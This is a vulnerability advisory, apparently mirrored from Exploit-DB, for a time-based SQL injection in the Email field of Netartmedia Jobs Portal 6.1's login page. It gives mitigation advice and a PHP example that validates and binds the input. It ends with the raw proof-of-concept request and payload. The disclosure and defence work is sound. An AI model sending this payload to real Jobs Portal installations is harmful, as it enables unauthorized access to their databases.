Vendor: Jobs Portal
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: Jobs Portal
Affected Version From: 6.1
Affected Version To: 6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:jobs_portal:6.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia Jobs Portal 6.1 – SQL Injection

Netartmedia Jobs Portal 6.1 is vulnerable to SQL injection. An attacker can exploit it by sending a specially crafted payload to the loginaction.php page. The payload is sent as the Email POST parameter, where the application expects an email address. It is designed to cause the application to pause for a period of time, and the delay indicates successful exploitation of the vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in any SQL query.
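
The following is an added example, not code from Jobs Portal or from the advisory author: a login check that validates the Email field and then binds it as a query parameter. The `users` table, its columns, the function names, the password hashing and the in-memory SQLite database are assumptions made so the example runs on its own.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's user table.
// Table and column names are assumptions, not the Jobs Portal schema.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (email TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO users (email, password_hash) VALUES (:email, :hash)');
    $ins->execute([
        ':email' => 'alice@example.com',
        ':hash'  => password_hash('g00dPa$$w0rD', PASSWORD_DEFAULT),
    ]);
    return $db;
}

// Hardened login check: validate the Email field, then bind it as a parameter
// so the value can never change the structure of the SQL statement.
function check_login(PDO $db, string $email, string $password): bool
{
    // Layer 1: input validation. Reject anything that is not an e-mail address.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Layer 2: parameterized query. The value travels separately from the SQL text.
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $hash = $stmt->fetchColumn();

    return is_string($hash) && password_verify($password, $hash);
}

$db = make_demo_db();
// The Email value from the PoC on this page, URL-decoded as the server receives it.
$poc = "0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z";

var_dump(check_login($db, 'alice@example.com', 'g00dPa$$w0rD')); // constructed valid account
var_dump(check_login($db, $poc, 'g00dPa$$w0rD'));                // PoC value fails e-mail validation
var_dump(check_login($db, "o'brien@example.com", 'x'));          // quote in a valid address, bound as data
```

The third call is why validation alone is not sufficient: a syntactically valid address may contain a quote, and only the bound parameter keeps it out of the SQL text.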

Exploit-DB raw data:

# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/jobsportal/
# Demo Site: https://www.ittjobs.com/
# Version: 6.1
# Tested on: Kali Linux
# CVE: N/A

----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login